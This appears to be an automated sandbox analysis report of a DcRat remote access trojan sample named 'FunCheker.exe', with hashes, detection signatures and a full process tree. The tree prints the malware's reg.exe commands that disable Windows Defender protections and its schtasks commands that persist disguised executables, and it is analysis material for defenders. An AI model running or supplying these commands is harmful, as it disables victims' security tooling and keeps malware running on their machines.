Resubmissions

22-07-2024 19:12

240722-xwylbstbjc 10

22-07-2024 19:02

240722-xpxqfssfle 10

Analysis

  • max time kernel
    150s
  • max time network
    82s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
  • submitted
    22-07-2024 19:02

General

  • Target

    FunCheker.exe

  • Size

    1.9MB

  • MD5

    a69f81ab8922f56e786c95000e4ea238

  • SHA1

    eec04e5776a155f4445260b46f8fa3b139ccedef

  • SHA256

    c36b87352873121329f10440ce883510be4c7d829d6afe7ee28664b79cddfd8d

  • SHA512

    de9a791be937925f0ab9d665e6282237f78b4b14f11e539bbcb9dd1ee95b0421a00ab841adb97ed3f41d3d92d94a569728edb486940afb690114bf825a42aeab

  • SSDEEP

    49152:mIduhWrW/Si9FPOcS/up3M4vsEVXxQ4mxS5WDK:BuMr6zxSmp8Bi6I

Malware Config

Signatures

  • DcRat 55 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Process spawned unexpected child process 54 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Executes dropped EXE 22 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 24 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FunCheker.exe
    "C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4756
    • C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
      "C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4952
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"
        3⤵
          PID:2256
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "
            4⤵
              PID:1476
              • C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe
                "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"
                5⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4944
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat"
                  6⤵
                    PID:3584
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      7⤵
                        PID:4088
                      • C:\Recovery\WindowsRE\explorer.exe
                        "C:\Recovery\WindowsRE\explorer.exe"
                        7⤵
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4048
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat"
                          8⤵
                            PID:4564
                            • C:\Windows\system32\w32tm.exe
                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              9⤵
                                PID:4624
                              • C:\Recovery\WindowsRE\explorer.exe
                                "C:\Recovery\WindowsRE\explorer.exe"
                                9⤵
                                • Executes dropped EXE
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4732
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat"
                                  10⤵
                                    PID:4180
                                    • C:\Windows\system32\w32tm.exe
                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      11⤵
                                        PID:3440
                                      • C:\Recovery\WindowsRE\explorer.exe
                                        "C:\Recovery\WindowsRE\explorer.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3496
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat"
                                          12⤵
                                            PID:2276
                                            • C:\Windows\system32\w32tm.exe
                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              13⤵
                                                PID:3872
                                              • C:\Recovery\WindowsRE\explorer.exe
                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                13⤵
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3236
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat"
                                                  14⤵
                                                    PID:1284
                                                    • C:\Windows\system32\w32tm.exe
                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                      15⤵
                                                        PID:4104
                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                        15⤵
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4492
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat"
                                                          16⤵
                                                            PID:4560
                                                            • C:\Windows\system32\w32tm.exe
                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                              17⤵
                                                                PID:3232
                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                17⤵
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5088
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat"
                                                                  18⤵
                                                                    PID:4036
                                                                    • C:\Windows\system32\w32tm.exe
                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                      19⤵
                                                                        PID:2076
                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                        19⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4680
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat"
                                                                          20⤵
                                                                            PID:228
                                                                            • C:\Windows\system32\w32tm.exe
                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                              21⤵
                                                                                PID:5040
                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                21⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4392
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat"
                                                                                  22⤵
                                                                                    PID:5072
                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      23⤵
                                                                                        PID:5000
                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                        23⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2764
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat"
                                                                                          24⤵
                                                                                            PID:320
                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                              25⤵
                                                                                                PID:2604
                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                25⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies registry class
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4260
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat"
                                                                                                  26⤵
                                                                                                    PID:1516
                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                      27⤵
                                                                                                        PID:4256
                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                        27⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:976
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat"
                                                                                                          28⤵
                                                                                                            PID:2852
                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                              29⤵
                                                                                                                PID:2328
                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                29⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3188
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat"
                                                                                                                  30⤵
                                                                                                                    PID:1284
                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                      31⤵
                                                                                                                        PID:3568
                                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                        31⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Modifies registry class
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4452
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat"
                                                                                                                          32⤵
                                                                                                                            PID:1508
                                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                              33⤵
                                                                                                                                PID:1416
                                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                33⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2700
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat"
                                                                                                                                  34⤵
                                                                                                                                    PID:4932
                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                      35⤵
                                                                                                                                        PID:3196
                                                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                        35⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2760
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat"
                                                                                                                                          36⤵
                                                                                                                                            PID:200
                                                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                              37⤵
                                                                                                                                                PID:1476
                                                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                37⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3636
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat"
                                                                                                                                                  38⤵
                                                                                                                                                    PID:3584
                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                      39⤵
                                                                                                                                                        PID:32
                                                                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                        39⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:5000
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat"
                                                                                                                                                          40⤵
                                                                                                                                                            PID:3136
                                                                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                              41⤵
                                                                                                                                                                PID:2764
                                                                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                                41⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:2952
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"
                                                                                                                                                                  42⤵
                                                                                                                                                                    PID:4732
                                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                      43⤵
                                                                                                                                                                        PID:4708
                                                                                                                                                                      • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                                        "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                                        43⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4256
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat"
                                                                                                                                                                          44⤵
                                                                                                                                                                            PID:2468
                                                                                                                                                                            • C:\Windows\system32\w32tm.exe
                                                                                                                                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                              45⤵
                                                                                                                                                                                PID:976
                                                                                                                                                                              • C:\Recovery\WindowsRE\explorer.exe
                                                                                                                                                                                "C:\Recovery\WindowsRE\explorer.exe"
                                                                                                                                                                                45⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:5020
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat"
                                                                                                                                                                                  46⤵
                                                                                                                                                                                    PID:4656
                                                                                                                                                                                    • C:\Windows\system32\w32tm.exe
                                                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                      47⤵
                                                                                                                                                                                        PID:2696
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
                                                                                              2⤵
                                                                                                PID:2280
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "
                                                                                                2⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3800
                                                                                                • C:\Windows\system32\chcp.com
                                                                                                  chcp 65001
                                                                                                  3⤵
                                                                                                    PID:2076
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
                                                                                                  2⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3228
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                    3⤵
                                                                                                    • DcRat
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:4748
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                    3⤵
                                                                                                      PID:3640
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                      3⤵
                                                                                                        PID:316
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                        3⤵
                                                                                                          PID:208
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:1888
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:2784
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:4676
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:704
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                          PID:1844
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                          3⤵
                                                                                                            PID:1652
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                            3⤵
                                                                                                              PID:4948
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                              3⤵
                                                                                                                PID:800
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                3⤵
                                                                                                                  PID:3484
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                  3⤵
                                                                                                                    PID:4688
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                    3⤵
                                                                                                                      PID:5020
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                      3⤵
                                                                                                                        PID:3916
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                        3⤵
                                                                                                                          PID:3396
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                          3⤵
                                                                                                                            PID:2020
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                            3⤵
                                                                                                                              PID:3556
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                              3⤵
                                                                                                                                PID:2088
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                3⤵
                                                                                                                                  PID:3024
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                  3⤵
                                                                                                                                    PID:440
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                    3⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:4940
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                    3⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:2260
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                    3⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:4600
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    3⤵
                                                                                                                                      PID:808
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      3⤵
                                                                                                                                        PID:2220
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        3⤵
                                                                                                                                          PID:4176
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                          3⤵
                                                                                                                                            PID:3220
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            3⤵
                                                                                                                                            • Modifies security service
                                                                                                                                            PID:4564
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2928
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3080
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4476
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3332
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:3192
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4256
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\lsass.exe'" /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:672
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f
                                                                                                                                        1⤵
                                                                                                                                        • DcRat
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2008
